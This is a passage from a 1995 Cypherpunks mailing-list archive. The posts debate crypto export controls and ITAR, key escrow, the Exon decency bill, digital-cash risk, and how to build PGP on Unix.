By the way, I recently discovered a new twist on "age credentials": the use of credit cards to prove age. One image site is asking for a "valid credit card number" to be given...not to use for charges, but just to do a quick verification (they claim a few minutes or less) that the card is valid and in the name of the person accessing their site. Some obvious security issue. An interesting twist, though. If the Exon Bill really does go into effect, and age limits on access are imposed, I'll be looking for what we've always joked about: the "Information Superhighway Driver's License." --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From hua at chromatic.com Wed Dec 6 09:49:46 1995 From: hua at chromatic.com (Ernest Hua) Date: Wed, 6 Dec 95 09:49:46 PST Subject: Solution for US/Foreign Software? In-Reply-To: Message-ID: <9512061750.AA07635@krypton.chromatic.com> > I'm not saying they are a "bypass" of the laws. Rather, I'm saying that > if the goal is to: > > 1. Let companies like Netscape make foreign sales. > > 2. Still comply with the letter of the law. It takes more than one or two people to coordinate an international effort. Once more than a few people know about it, it becomes "company policy" or "corporate objective", in which case, the NSA/DoS will eventually figure it out and start levying heavy fines and jailing the individuals. The main point is that there is no such thing as the "letter of the law". What they enforce is much broader than that, and how they enforce it is much more subtle than clear-cut criminal prosecution. Therefore, you cannot just use literal loop holes just because it's not clear, because the law they are enforcing is not clear either. This response should almost be an FAQ for this crowd. Ern From hua at chromatic.com Wed Dec 6 10:00:28 1995 From: hua at chromatic.com (Ernest Hua) Date: Wed, 6 Dec 95 10:00:28 PST Subject: The "Future" Fallacy In-Reply-To: Message-ID: <9512061801.AA07656@krypton.chromatic.com> > > > Bill Gates (like Mister Newt before him) committed what I call the Future > > > Fallacy in "The Road Ahead." Page 106. > > > > > > "Soon any child old enough to use a computer will be able to transmit > > > coded messages that no government on earth will find easy to decipher." > > > > > > Billg is an optimist. > > > > I found nothing wrong or incorrect with the quote Duncan attributed to Bill > > Gates (I haven't read Gates' book). > > I think Duncan was mad at the 'soon.' Why not today? I think I can answer this question because I was an obnoxious little hacker with an Atari 800 when I was a kid. The only thing I did not have was a modem and an Internet connection (thus ability to read sci.crypt.research etc ...) I did have arbitrary precision math libraries (although I did not have any engineering concept of "libraries"), and I had written some non-trivial scrambling code (it's not RSA, of course). I am, by no means, a super-smart person. Therefore, it is not a stretch to believe that kids today can perform powerful encryption in the privacy of their own homes. Therefore, to Bill G and his "prophecy": "been there, done that" ... (Apologies to those who hate that phrase; I hate it too, but it is so obnoxious that it gets the point across.) Ern From drcharpe at hamlet.uncg.edu Wed Dec 6 10:07:47 1995 From: drcharpe at hamlet.uncg.edu (Daniel 'genius' Charpentier) Date: Wed, 6 Dec 95 10:07:47 PST Subject: PGP Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I've tried to find out the answers to my questions myself but I haven't been very successful. Actually, I haven't been successful at all. First of all, I've been using PGP on my computer but when I tried to port it over to my unix account it didn't work. I took the source code and tried to compile it using the unix g++ compiler but it gave me all of these errors. Where can I find PGP that is already compiled for unix or at the very least will compile for unix? Secondly, if I create a program that makes using PGP more user friendly can I let other people have it ( for FREE )? Lastly, what is considered overkill with cryptography? I don't believe anything is. My programs accept what the user inputs for how large prime numbers should be ( my public key programs ) but I make them able to accept values that go up to 30720 bits ( I don't believe a number can ever be large enough ). You can never be to safe...never. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMMXVhDMGe42brZbVAQEo/Qf7BSshqKJAmxVzyGSyAp2Qkj+/dqh1Zon1 xDqMnvU6ihLimHZ/uXGiQE2jM6N8FRbYu7psQ/iPJ+gX5/VKfrxlxjCfDM0Jx2s9 vucgMQz1KYbELA8Fo1QUEsDuTMzJ80VoTicXfZZmILhr7cBJH4pHa5RgkgrS2Lun iodQ+F7BXdio86TnctQgoKJ+78qOYDuV4Vfha/a290ZoZmPRcqArYv7tU6X3KMjf DGxqgugiwpHnkTO1B9wypoePbbJZSNzFYYvZKMI8Ntg7yFkMl/lSxcLh6oYq0ACe R9NfZR9x11H/fIrn8HZlq0Q86OptWhZz53p77VNN+sVZJOktHJIWqg== =WK6x -----END PGP SIGNATURE----- From froomkin at law.miami.edu Wed Dec 6 10:22:47 1995 From: froomkin at law.miami.edu (Michael Froomkin) Date: Wed, 6 Dec 95 10:22:47 PST Subject: NIST GAK export meeting, short version In-Reply-To: <199512060426.XAA20883@thor.cs.umass.edu> Message-ID: On Tue, 5 Dec 1995, Futplex wrote: > This answer sounds rather silly to me. Do they seriously doubt that the > escrow mechanism works (modulo MAB's observations about the LEAF), or expect No. They doubt that "software binding" works, ie are afraid someone will figure out an easy way to hack the software to by-pass the escrow mechanism. > us to believe that they do ? Clinton Brooks' comments cited later by Pat > suggest a certain acceptance that enforcement will have its problems > (e.g. strong crypto tunnelling), but perhaps Greiveldinger somehow doesn't > officially share that view. Is there another interpretation of "working" > I'm missing here ? > > -Futplex > "I'm from the D.O.E. and I just need to leave this here temporarily" > (from a political cartoon entitled "The 3 Biggest Whoppers") > A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | U. Miami School of Law | froomkin at law.miami.edu P.O. Box 248087 | http://www.law.miami.edu/~froomkin Coral Gables, FL 33124 USA | It's warm here. From tcmay at got.net Wed Dec 6 10:22:52 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 6 Dec 95 10:22:52 PST Subject: Solution for US/Foreign Software? Message-ID: At 5:50 PM 12/6/95, Ernest Hua wrote: >The main point is that there is no such thing as the "letter of the law". >What they enforce is much broader than that, and how they enforce it is much >more subtle than clear-cut criminal prosecution. Therefore, you cannot just >use literal loop holes just because it's not clear, because the law they are >enforcing is not clear either. > >This response should almost be an FAQ for this crowd. Indeed. In fact, my Cyphernomicon FAQ contains numerous discussions about ITAR and hooks. For example: - Dan Bernstein has argued that ITAR covers nearly all aspects of exporting crypto material, including codes, documentation, and even "knowledge." (Controversially, it may be in violation of ITAR for knowledgeable crypto people to even leave the country with the intention of developing crypto tools overseas.) and 10.10.6. "Can ITAR and other export laws be bypassed or skirted by doing development offshore and then _importing_ strong crypto into the U.S.?" - IBM is reportedly doing just this: developing strong crypto products for OS/2 at its overseas labs, thus skirting the export laws (which have weakened the keys to some of their network security products to the 40 bits that are allowed). + Some problems: - can't send docs and knowhow to offshore facilities (some obvious enforcement problems, but this is how the law reads) - may not even be able to transfer knowledgeable people to offshore facilities, if the chief intent is to then have them develop crypto products offshore (some deep Constitutional issues, I would think...some shades of how the U.S.S.R. justified denying departure visas for "needed" workers) - As with so many cases invovling crypto, there are no defining legal cases that I am aware of. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From aleph1 at dfw.net Wed Dec 6 10:28:35 1995 From: aleph1 at dfw.net (Aleph One) Date: Wed, 6 Dec 95 10:28:35 PST Subject: Secret Clearance In-Reply-To: Message-ID: On Wed, 6 Dec 1995, Robert A. Rosenberg wrote: > The problem is that they are subject to blackmailed/bribed/subversion ONLY > because the employer will use the info as an excuse for firing/restricting > the employee. If someone has a "skeleton in the closet" such as being gay, > so long as the employer does not discrimate against gays who INFORM the > employer of their sexual orientation or if the employer does not care about > the person being gay (ie: removes it a potential blackmail threat) there is > no problem so far as I can see. It is only when there is something that is > WORK RELATED which would affect the person's performance if not known that > the question of a background check is relevant. Thats not compleately true. He may not care that his employer know that he is gay, but he would not anything for say his old mother and father not to know. You cant never be sure about what people *really* care about. Aleph One / aleph1 at dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 From alano at teleport.com Wed Dec 6 10:40:21 1995 From: alano at teleport.com (Alan Olsen) Date: Wed, 6 Dec 95 10:40:21 PST Subject: Barring access to Netscape Message-ID: <2.2b7.32.19951206184122.00836cd4@mail.teleport.com> At 03:28 PM 12/1/95 -0500, you wrote: >You can get your server to simply put that at the top of every page >served to a Netscape client, followed by a horizontal line and the >normal web page. It should be easy to put together the hacks to do >that and get them out to lots of people. Watch how fast people would >switch from Netscape, especially were it widely deployed. You would >then watch a fast fall in Netscape stock, which would likely piss Jim >Clark off far more than anything else one could do. This type of page hack is pretty easy. Take a look at _HTML & CGI Unleashed_ from Netsams press. Page 410 has a script that can be easily modified to do something similar. (Great book, but lacks some of the more advanced server redirect tricks I have seen elsewhere.) The example is for displaying an optional display for browsers that cannot deal with image maps. It can be altered to do the same to any browser. >We need HTML 3.0 capable browsers for all platforms, though. They (the W3O) need to agree what HTML 3.0 consists of before that will happen soon... | What is the Eye in the Food Pyramid? | alano at teleport.com | |"The moral PGP Diffie taught Zimmerman unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" | Ignore the man | |`finger -l alano at teleport.com` for PGP 2.6.2 key | behind the keyboard.| | http://www.teleport.com/~alano/ | | From llurch at networking.stanford.edu Wed Dec 6 10:46:58 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Wed, 6 Dec 95 10:46:58 PST Subject: Microsoft Internet Announcements Thursday, December 7, 1995 Message-ID: -----BEGIN PGP SIGNED MESSAGE----- "A day that will live in infamy." Anyone have the exact time that Bill will begin speaking? I think it would be "neat" if we timed the release of a complete rewrite of the win95netbugs FAQ (with a new security section), improvements to the hackmsoft page, and other stuff for 15 minutes after Bill begins. The win95netbugs FAQ, version 4.00.950, will be posted to the following places tomorrow morning (I'll probably be up all night): http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html [canon URL; multiple load-balancing SPARCServers] http://www-dccs.stanford.edu/NetConsult/Win95Net/faq.html [use this if you have an old Sun DNS server that barfs on the www-leland lbnamed tricks] news.answers, comp.answers, comp.protocols.tcp-ip.ibmpc, and several higher-traffic groups (this will be the first approved and rtfm-archived posting; the news-answers folks got back to me last week). I'll probably create the throwaway w95netbugs at aol.com for posting purposes. gopher://quixote.stanford.edu/1m/win95netbugs An email autoresponder to be named later (finger this account in the morning). An ezine or three to be named later. - -rich -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMMXlBY3DXUbM57SdAQFnzwP/ZaFJsyz7H/uViPAetTiaBnLxvgZBFmiE mURZdUHU7vVPZ1cIjdO2j0ARoulwQvzXUywezTHusIBGgbxdMf0/NpErpAbFktvA /A7uBGo38scSaYIATLpMEMx8aomoeDiwRxUyzXTCAaRnBHfHf0l0/egDUYPWnK3D ZTF1cFzv+jA= =cHCp -----END PGP SIGNATURE----- From jimbell at pacifier.com Wed Dec 6 10:57:43 1995 From: jimbell at pacifier.com (jim bell) Date: Wed, 6 Dec 95 10:57:43 PST Subject: Solution for US/Foreign Software? Message-ID: >At 8:06 AM 12/6/95, jim bell wrote: > >>>"Crypto hooks," basically the scheme you are proposing, were thought of by >>>the authorities and are not a bypass of the crypto export laws. >>>--Tim May >> >> >>I'm not saying they are a "bypass" of the laws. Rather, I'm saying that >>if the goal is to: >> >>1. Let companies like Netscape make foreign sales. >> >>2. Still comply with the letter of the law. >> > >And I'm saying that your proposal does NOT comply with the letter of the >law. There's no point in arguing this, as the facts are clear. Consult the >ITARs and the previous discussions here and elsewhere on the practice of >leaving "hooks" that crypto modules can later be attached to. NO! You didn't read my commentary carefully enough. These "hooks" (your words) will, in effect, already be connected to encryption software weak enough to make NSA happy. You know, 40 bit keys or something like that. But instead of being in one large file, embedded into a program, it'll be TWO files. Simple programming change. Everything that implements/defines/limits the encryption to 40 bits will be in the smaller file. This really isn't a "hook," it's an internal connection between two portions of the same program. (actually, it wouldn't need to be in two separate files; a file which implements a patch for the first file would work great.) It'll be exportable, because its key size is "acceptable." At the time the export license is requested, the replacement module to increase key size probably won't even exist, in order to avoid giving the USG an excuse to deny the export license. After the license is obtained, the replacement module is written and shipped to domestic users. I fully realize the USG won't "like" this kind of thing. But if they are trying to take the position that certain kinds of encryption software CAN be exported, and some can't, they're going to have to approve SOME programs for export, using criteria which at least pretend to be objective. In view of the nearly limitless possibility of patches, how would YOU distinguish between programs? From dsmith at midwest.net Wed Dec 6 11:03:24 1995 From: dsmith at midwest.net (David E. Smith) Date: Wed, 6 Dec 95 11:03:24 PST Subject: GAK Message-ID: <199512061921.NAA00175@cdale1.midwest.net> -----BEGIN PGP SIGNED MESSAGE----- At 11:56 AM 12/6/95 EST, SBinkley at atitech.ca wrote: >I heard a while back about being able to "split" up a PGP key. I suppose you could, with some variant of Shamir's secret- sharing scheme. I'm not familiar with any specific applications that do this. (But that's irrelevant.) >What about splitting up the key into many parts, and giving >them out to multiple INDEPENDANT agencies. ie: One piece >goes to the FBI, one to the NSA, one to some other committee, >and so on. That way, no goverment body could just tap your >conversations without getting approval from others, and >gaining the pieces of your key. That still doesn't address the basic issue - that the government has NO RIGHT to access our _private_ keys. If you want to assume a fairly paranoid threat model, each of these different agencies will instantly combine their parts to generate the whole key. If you trust the government, it might work. Personally, I trust the government about as far as I can throw the typical Man In Black. Dave -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMMXoeAwyfvCScyE5AQEFqQQAihutub3GQDi/FtiDkAfxgb8dzFAEnZ/H LD588iuIxX3G3M0fLmAkRuUKE7fdhExkAO1IYFwH0oM/bI8KdSrY/RyeqnQFRwVo /Vvr6nwVMdLP94Vt9Gi4QXJ4dVBHXwfvRUm5/HdLqqh8UH2HLKO1jdt82H539paM ZhiZkMmNlCs= =0kWW -----END PGP SIGNATURE----- ----- David E. Smith, c/o Southeast Missouri State University 1210 Towers South, Cape Girardeau MO USA 63701-4745 +1(573)339-3814, "dsmith at midwest.net", PGP ID 0x92732139 http://www.midwest.net/scribers/dsmith/ From dsmith at midwest.net Wed Dec 6 11:03:26 1995 From: dsmith at midwest.net (David E. Smith) Date: Wed, 6 Dec 95 11:03:26 PST Subject: PGP Message-ID: <199512061921.NAA00167@cdale1.midwest.net> -----BEGIN PGP SIGNED MESSAGE----- At 12:54 PM 12/6/95 -0500, you wrote: > I've tried to find out the answers to my >questions myself but I haven't been very successful. >Actually, I haven't been successful at all. First of all, >I've been using PGP on my computer but when I tried to port it >over to my unix account it didn't work. I took the source code >and tried to compile it using the unix g++ compiler but it gave >me all of these errors. Where can I find PGP that is already >compiled for unix or at the very least will compile for unix? >Secondly, if I create a program that makes using PGP more >user friendly can I let other people have it ( for FREE )? >Lastly, what is considered overkill with cryptography? >I don't believe anything is. My programs accept what the user >inputs for how large prime numbers should be ( my public >key programs ) but I make them able to accept values that go >up to 30720 bits ( I don't believe a number can ever be large >enough ). You can never be to safe...never. Firstly - and don't take this personally - how much computer knowledge do you have? The PGP sources use all sorts of #ifdefs and other kludges. A fair amount of C coding ability is needed to get the damn things to do much of anything. (Hell, I can't read most of it - my precompiled MSDOS version does what I need it to do.) If you make PGP more user friendly... well, PGP 3.0 is still coming Real Soon Now (TM) and it will include an API that will make hooking into it ridiculously simple. Beyond that, there are already a number of good DOS and Windows shells for it, and nobody on unix-flavoured systems expects a clean user interface anyway :) (Well, except for XWindows...) But, if you write it - and I'm cautioning you to be sure you don't reinvent the wheel - you can distribute it freely. I suggest using the terms of the GNU GPL. And the key values - well, you can give it 32k bits, but 1. generating a key pair could take a prohibitively long time; 2. nobody else can use it (the default PGP distributions are capped off at 2047 bits). Good luck. Dave -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMMXoSwwyfvCScyE5AQEwtQQA0IHRhQiBej05B8KfFMJh95+XVvzW5ax1 SgQGrNABIdnyOkDSgPLA97vQ04agU8ytOyaDMW/X4IuI/zZgsqOzegsb57+TEcAz sB7mvzmW0tTrEEdMRjBkaZRAnf0wTrf2EqtR3lshJCgzK1MB6szG3w4N8yb26YKD 2VyBrX10nRY= =sRw4 -----END PGP SIGNATURE----- ----- David E. Smith, c/o Southeast Missouri State University 1210 Towers South, Cape Girardeau MO USA 63701-4745 +1(573)339-3814, "dsmith at midwest.net", PGP ID 0x92732139 http://www.midwest.net/scribers/dsmith/ From drcharpe at hamlet.uncg.edu Wed Dec 6 11:07:07 1995 From: drcharpe at hamlet.uncg.edu (DANIEL CHARPENTIER) Date: Wed, 6 Dec 95 11:07:07 PST Subject: PGP In-Reply-To: <199512061853.MAA17582@spirit.sctc.com> Message-ID: On Wed, 6 Dec 1995, david d `zoo' zuhn wrote: > Also, you can have keys that are too large. Do you want to take hours to > encrypt a simple file, just because you have a 30000 bit key? Do you > expect your recipients to take the same amount of time (or more) to > decrypt it? > The tradeoff between cost & security is probably too high in that case (I > surely wouldn't bother to decrypt anything you sent me if I had to wait > hours or more). Now be practical. You do have options. Just because you have the capability to encrypt with a 30000 bit key does NOT mean that it is mandated that you encrypt with a 30000 bit key. The reason that cypherpunks is even in existence is that sometimes privacy is a must. Sometimes you want to make sure that a common thief can not read your files and others you want to make sure the N.S.A. can not read your files. This is not in dispute. We all know this. Having the option is comforting ( in my opinion of course ). From tcmay at got.net Wed Dec 6 11:08:46 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 6 Dec 95 11:08:46 PST Subject: Solution for US/Foreign Software? Message-ID: At 6:21 PM 12/6/95, jim bell wrote: >NO! You didn't read my commentary carefully enough. These "hooks" (your >words) will, in effect, already be connected to encryption software weak >enough to make NSA happy. You know, 40 bit keys or something like that. >But instead of being in one large file, embedded into a program, it'll be >TWO files. Simple programming change. Everything that >implements/defines/limits the encryption to 40 bits will be in the smaller >file. >This really isn't a "hook," it's an internal connection between two >portions of the same program. (actually, it wouldn't need to be in two >separate files; a file which implements a patch for the first file would >work great.) > >It'll be exportable, because its key size is "acceptable." At the time >the export license is requested, the replacement module to increase key >size probably won't even exist, in order to avoid giving the USG an >excuse to deny the export license. After the license is obtained, the >replacement module is written and shipped to domestic users. > >I fully realize the USG won't "like" this kind of thing. But if they are >trying to take the position that certain kinds of encryption software CAN >be exported, and some can't, they're going to have to approve SOME >programs for export, using criteria which at least pretend to be >objective. Yes, I read your proposal. The "hooks" term is not my coinage, but refers to this general idea. I urge you to read what others, including companies, have had to say on this matter. Much of the debate on "interoperability" revolves around details of entry points to crypto modules and such hooks. No point in arguing with Jim on this anymore, so I won't. Good luck, Jim, in introducing such a product. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From llurch at networking.stanford.edu Wed Dec 6 11:17:56 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Wed, 6 Dec 95 11:17:56 PST Subject: ERA_sur In-Reply-To: <199512061429.JAA08877@pipe4.nyc.pipeline.com> Message-ID: On Wed, 6 Dec 1995, John Young wrote: > There's implicit boost for encryption in the controversial > "undeleting" of personal files on Jean Lewis's floppy, > subpoenaed by Whitewater investigators. > > Peter Wayner has a thread about it on Cyberia-L. I'd say this is relevant, and a good article. It was also in yesterday's San Jose Mercury News, which is available on America "On Line" and other places. Might be on www.sjmercury.com. [Where] is Cyberia-L archived? -rich From EALLENSMITH at mbcl.rutgers.edu Wed Dec 6 11:24:02 1995 From: EALLENSMITH at mbcl.rutgers.edu (E. ALLEN SMITH) Date: Wed, 6 Dec 95 11:24:02 PST Subject: Geodesic Payment Systems? (was Re: Meeting notes from ANSI X.9Meeting on Electronic Payment) Message-ID: <01HYHNP19ND89S3REI@mbcl.rutgers.edu> From: IN%"nsb+limbo at nsb.fv.com" "Nathaniel Borenstein" 6-DEC-1995 07:21:19.03 I had assumed that there was a market discount, but it's still not quite that simple. It's very hard for markets to deal with *unbounded* risk. The biggest problem I see with most of the crypto-cash schemes is that there is a legitimate scenario -- however low-probability you might assess it to be -- of break-the-bank catastrophic failure, i.e. in which someone gains the keys that allow him to essentially print money. This kind of low-probability, infinite-cost risk is the kind of thing that gives underwriters the heebie jeebies. There's a good reason that most companies have "Ltd" after their name instead of "Unlimited", in those countries where that's the naming convention. -------------------------- The risk in question is not infinite-cost. If the person who gets ahold of the keys starts simply making lots and lots of money, in a free market the prices in digital cash for everything will start going up. This phenomenon will be spotted, and those taking the particular variety in question will stop accepting it. Losses are limited to however much was out there at a given time, and if there are multiple systems with free-market interconversion between them, that may not be very much. People will move out of a decaying monetary system if: A. the new system is as easy to get as the old; and B. the new system is as easy to spend as the old. If the person who gets the keys simply uses them on a small scale, then the resulting inflation and loss of value can simply be dealt with using the discount mechanism. It's no longer infinite risk. -Allen From tien at well.sf.ca.us Wed Dec 6 11:25:11 1995 From: tien at well.sf.ca.us (Lee Tien) Date: Wed, 6 Dec 95 11:25:11 PST Subject: GAK Flap Happening at a Good Time--Journalists Read! Message-ID: <199512061926.LAA25326@well.com> Sameer wrote: There was no Netscape (or RSADSI, for that matter [an RSADSI employee showed up, but it was on his own time]) representative at the recent Bernstein hearing in SF. I think that shows how much they really care. Actually, this is not entirely correct. An attorney for a firm which is outside counsel (crypto-related) to Netscape did attend the Bernstein hearing. Lee Tien From tien at well.sf.ca.us Wed Dec 6 11:25:22 1995 From: tien at well.sf.ca.us (Lee Tien) Date: Wed, 6 Dec 95 11:25:22 PST Subject: Use of PGP as an export? Message-ID: <199512061926.LAA25435@well.com> Actually, the ITAR contains specific provisions for "defense services," and it is possible to "export" "defense services." Lee Tien From: Bill Stewart Date: Sat, 02 Dec 1995 19:24:24 -0800 Subject: Re: Use of PGP as an export? At 09:09 PM 12/2/95 -0800, Ted Cabeen wrote: >I think this has been brought up before, but I could only find one reference >to it in the archives and it wasn't too helpful, so I'll ask again. If a >university provided a copy of PGP for use on their unix machines and a >non-resident, non-citizen *used* the copy of PGP on the server, but did not >download it onto their own machine, but instead just ran PGP on the server >alone, would it be a violation of the ITAR? My school is interested in >putting a copy of PGP on the university server and wants to know if they >should somehow restrict access to citizens and legal residents only. Thanks. That's not giving technical data to the foreigner, that's providing a service; the ITAR doesn't seem to restrict that. It's not an especially secure way to operate, but that's an inherent problem with multi-user systems or file servers. One way to implement it that would be only mildly insecure would be to put PGP on a file server, with execute-only permissions; users of client machines still could be attacked by somebody faking out NFS, but they wouldn't have to send their passphrases across the net the way they would in a telnet session. #-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 Lee Tien Attorney tien at well.sf.ca.us (510) 525-0817 voice (510) 525-3015 fax From drcharpe at hamlet.uncg.edu Wed Dec 6 11:26:46 1995 From: drcharpe at hamlet.uncg.edu (DANIEL CHARPENTIER) Date: Wed, 6 Dec 95 11:26:46 PST Subject: PGP In-Reply-To: <199512061921.NAA00167@cdale1.midwest.net> Message-ID: On Wed, 6 Dec 1995, David E. Smith wrote: > Firstly - and don't take this personally - how much computer > knowledge do you have? The PGP sources use all sorts of > #ifdefs and other kludges. A fair amount of C coding > ability is needed to get the damn things to do much of > anything. (Hell, I can't read most of it - my precompiled > MSDOS version does what I need it to do.) Sorry...I was always taught that the user should not be mandated to finish the job of the programmer. Please, do not take me wrong, PGP is a remarkable tool...but I was not aware I had iron out the bugs. That part is the easiest to do compared with the genius of the program... but I still should not have to do it. > If you make PGP more user friendly... well, PGP 3.0 is still > coming Real Soon Now (TM) and it will include an API that > will make hooking into it ridiculously simple. Beyond that, > there are already a number of good DOS and Windows shells > for it, and nobody on unix-flavoured systems expects a clean > user interface anyway :) (Well, except for XWindows...) Well maybe they ( people on "unix-flavoured systems" ) should expect a clean interface. If the interface were more sound then maybe the common man ( person ) wouldn't be so scared of it. I have a lot of friends that gave up on cryptography because they could not get the darned programs to work ( at least the good ones anyway ). > And the key values - well, you can give it 32k bits, but 1. > generating a key pair could take a prohibitively long time; > 2. nobody else can use it (the default PGP distributions > are capped off at 2047 bits). I was not using 32k bit keys with PGP...but I'll look at the code. To tell you the truth I never thought about modifing PGP to generate that large of a key. When I finish it I'll post the source here. I'm sure someone here would like to at least have the option. Thank you for the input. From jburrell at crl.com Wed Dec 6 11:30:36 1995 From: jburrell at crl.com (Jason Burrell) Date: Wed, 6 Dec 95 11:30:36 PST Subject: News on Congressional Debate on Exon In-Reply-To: Message-ID: On Wed, 6 Dec 1995, Timothy C. May wrote: > > I just heard (12:15 EST) that the House has adopted language similar to the > original Exon-Coates language in the Senate (as opposed to the White > language, which was less restrictive in that it dealt with material that > was "harmful" to children, interpreted to mean child porn). > > It looks like Internet Service Providers will soon be held liable for > "indecent material" passed by their systems. I would expect most ISPs will > drop the alt.binaries.* newsgroups as a first step, and maybe other groups > as well. *Sigh*. Are we really ready to go back to UUCP? It looks like we'll have to. That is, if someone doesn't set up a couple cryptographically enhanced subnets first, or come up with some better idea. Interesting prospect, actually. Anyone wish to comment on the prospect of a double blind server, set outside U.S. borders, that can act as an interface to the rest of the world, perhaps encrypting or stego'ing the data transfered between it and the user? Basically, an anonymous remailer that acts as a cross between an NNTP, POP3, and SMTP servers. > If the Exon Bill really does go into effect, and age limits on access are > imposed, I'll be looking for what we've always joked about: the > "Information Superhighway Driver's License." God help us all. -- Jason Burrell South Texas Communications From EALLENSMITH at mbcl.rutgers.edu Wed Dec 6 11:32:59 1995 From: EALLENSMITH at mbcl.rutgers.edu (E. ALLEN SMITH) Date: Wed, 6 Dec 95 11:32:59 PST Subject: Secret Clearance Message-ID: <01HYHO17G39Y9S3REI@mbcl.rutgers.edu> From: IN%"hal9001 at panix.com" "Robert A. Rosenberg" 6-DEC-1995 12:50:58.52 The problem is that they are subject to blackmailed/bribed/subversion ONLY because the employer will use the info as an excuse for firing/restricting the employee. If someone has a "skeleton in the closet" such as being gay, so long as the employer does not discrimate against gays who INFORM the employer of their sexual orientation or if the employer does not care about the person being gay (ie: removes it a potential blackmail threat) there is no problem so far as I can see. It is only when there is something that is WORK RELATED which would affect the person's performance if not known that the question of a background check is relevant. ------------------- Unfortunately, this only works if one assumes that work is the only thing that is valuable in the person's life. Blackmail can easily be used against someone who is afraid of some information emerging to their family, for instance. This perspective still isn't an excuse for disallowing gays, however... the person who should be held responsible for such problems is the person who responds negatively to the revelation. In other words, if the person's family would react negatively to the person being gay, that's the family's problem, and should be treated as such. -Allen From froomkin at law.miami.edu Wed Dec 6 11:38:05 1995 From: froomkin at law.miami.edu (Michael Froomkin) Date: Wed, 6 Dec 95 11:38:05 PST Subject: NIST GAK export meeting, sv In-Reply-To: <199512052356.AAA09563@utopia.hacktic.nl> Message-ID: Imagine you are in the Justice Dept. You have to work out a policy for escrow agents because your boss says so. You begin to work out scenarios, just like when you design software. One scenario is that the FISA court issues a warrant for a wiretap/decrypt of a suspected foreign agent. The fact of the order, and esp. the ID of the target, have a SECRET classification. It is a crime to show a SECRET document to a person without clearance. Yet, escrow agents can reasonably refuse to disclose a key (indeed, SHOULD refuse to disclose a key) without seeing a real warrant. How do you solve the problem? (Hint: asking Congress to change either the classification laws, the FISA court rules, or the GAK policy are not options.) I'm certain the above was a large part of their thinking in adding the requirement of a SECRET cleared person. If you accept their premises -- note the "if" -- it makes a certain degree of sense. I offer the following two bets for which I have no evidence: 1) This will be the PR that most damages the proposal 2) If they ever actually implement the policy, they will give the clearances out as fast as they can, just to show good faith. Not that SECRET is a very high clearance any more, anyway....It's main value is in giving them another way to jail you if you leak the fact of the order and it ruins the investigation. (Plus, I suppose, obstruction of justice...) CRYPTO: Does anyone recall the cite for a paper a few years that set out a way to have escrow agents who would be "oblivious" to the identity of the subject of the warrant? And how would such an escrow agent be sure that they were not being duped by the feds? A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | U. Miami School of Law | froomkin at law.miami.edu P.O. Box 248087 | http://www.law.miami.edu/~froomkin Coral Gables, FL 33124 USA | It's warm here. From warlord at ATHENA.MIT.EDU Wed Dec 6 11:42:08 1995 From: warlord at ATHENA.MIT.EDU (Derek Atkins) Date: Wed, 6 Dec 95 11:42:08 PST Subject: PGP In-Reply-To: Message-ID: <199512061943.OAA22480@charon.MIT.EDU> The PGP sources build on most UNIX platforms. Have you read the setup.doc? Have you followed the instructions? What Unix platform are you using? In general, all you need to do is: 1) build rsaref: cd rsaref/install/unix; make 2) build pgp: cd src; make Modulo a few quirks, that should be all. Look at the PGP FAQ, Buglist, Fixes, and Improvements Page for a list of known bugs+fixes in PGP 2.6.2: http://www.mit.edu:8001/people/warlord/pgp-faq.html If you need more help, email me offline (i.e., do not cc: cypherpunks) -derek From weidai at eskimo.com Wed Dec 6 11:44:11 1995 From: weidai at eskimo.com (Wei Dai) Date: Wed, 6 Dec 95 11:44:11 PST Subject: Geodesic Payment Systems? (was Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment) In-Reply-To: Message-ID: On Wed, 6 Dec 1995, Nathaniel Borenstein wrote: > I had assumed that there was a market discount, but it's still not quite > that simple. It's very hard for markets to deal with *unbounded* risk. > The biggest problem I see with most of the crypto-cash schemes is that > there is a legitimate scenario -- however low-probability you might > assess it to be -- of break-the-bank catastrophic failure, i.e. in which > someone gains the keys that allow him to essentially print money. This > kind of low-probability, infinite-cost risk is the kind of thing that > gives underwriters the heebie jeebies. There's a good reason that most > companies have "Ltd" after their name instead of "Unlimited", in those > countries where that's the naming convention. I find this argument totally unconvincing. No risk is unbounded. The worst thing that can possibly happen is that a nearby star goes supernova and completely destroys the earth. Yet markets handle this low-probability risk quite well. The direct cost of a break-the-bank catastrophic failure is bounded by the amount of capital the bank has. This is because the market will not accept more 